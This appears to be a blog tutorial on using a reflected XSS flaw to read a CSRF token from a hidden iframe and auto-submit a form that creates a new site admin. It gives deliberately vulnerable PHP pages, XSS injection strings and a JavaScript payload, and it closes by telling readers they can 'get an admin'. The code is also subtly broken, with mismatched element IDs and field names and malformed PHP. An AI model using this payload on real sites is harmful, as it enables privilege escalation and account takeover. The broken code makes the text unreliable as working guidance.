bypassing csrf protection through xss

In this article I want to talk about how to bypass protection against CSRF. This protection method is simple as FIG knows that: the server generates a token, it is put on the page with forms, when the user fills out the form and sends the result to the server, there is a check for the identity of the token that is stored on the server and what came from the user, if they do not match, the request to complete the action is canceled.

In this article I will not write what xss is and what csrf is, if you do not know about these types of vulnerabilities, Google is at your service.

So, there is a certain site, the following files are on the site:

  • index.php – main page with xss vulnerable field
  • newadmin.php – page with the form for creating a new admin
  • compare.php – php code that performs the specified action

index.php :

<html>
    <head>
        <title>
            Search
        </title>
    </head>
    <body>
        <?php if (isset($_POST['stext'])) echo $_POST['stext']; ?x>
        <form action="index.php" name="myform" method="post" >
            <input type="text" name="stext" value="" />
            <input type="submit" name="search" value="to find"/>    
        </form>
    </body>
</html>

newadmin.php :

<html>
    <head>
        <title>
            Adding a New Admin
        </title>
    </head>
    <body>
        <form action="compare.php" name="myform" method="post" >
            <input type="text" name="admin_name" value="NICK" />
            <input type="submit" name="preview" value="create"/>
            <input type="hidden" name="token" value="<?php echo $_SESSION['token'];?x>" /> 
<!-- the handler application puts the generated token here !-->
        </form>
    </body>
</html>

compare.php :

<?php
    if (isset($_POST['admin_name'] && isset[$_POST['token']]){ 
        if ($_POST['token']==$_SESSION['token']) // check the token that was sent from the form so that we have on the server
            echo "OK" // There should be instructions for creating an admin
                      // with the name of admin_name            
    }
?>

Now let’s think about XSS. And despite the fact that with the help of JavaScript we can access the source code of the loaded page, as well as perform actions such as submitting a form, etc.

It should also be noted that our XSS is located on the same site, and everything that happens in XSS will be the same as, for example, what is going on for an authorized user who is running this XSS, i.e., XSS works on behalf of the user who launched the user code (the victim ), which means the token “in the eyes” of the code embedded with the help of XSS will be the same as it will be for a careless but authorized user. I hope you understand what I mean. Therefore, if we have XSS, we can load the CSRF protected page with a token into memory, read it, parse it and pull out the token.

To do this, you can use two options

  • Send http headers (referrer, cookies, etc.) to the prepared script, which will send a GET request, read the response, and send the coveted token.
  • Download the page in the iframe and access the object containing the token.

So, as the first option is dregs and a waste of time, we will follow the path of least resistance, that is, we will consider point. So we have XSS in the request:

index.php? stext = "> <script> alert (/ xss /) </script>

We need to implement code that will do what is written in the title of the article.
In order not to be an eyesore, we create a file called js.js and put the code there that will open the newadmin.php page, read the token and pass it to the compare.php script:

document.write('<iframe id="hack" src="newadmin.php" width="0" height="0" onload="doit()"></iframe>');
function doit()
{
    var name ='NICK';
    var token=document.getElementById("iframe").contentDocument.forms[0].token.value;
    document.write('<form width="0" height="0" method="post" action="compare.php">');
    document.write('<input type="text" name="name" value="' +name +'" /><br />');
    document.write('<input type="hidden" name="token" value="' +token +'" />');
    document.write('<input type="submit" name="submit" value="Add_admin" /><br/>');
    document.write('</form>');
    document.forms[0].submit.click();
}

In principle, that’s all, now you can contact at

index.php? stext = "> <script src =" js.js "> alert (/ Yess! /) </script>

and get an admin or something else…

This entry was posted in security and tagged , , . Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *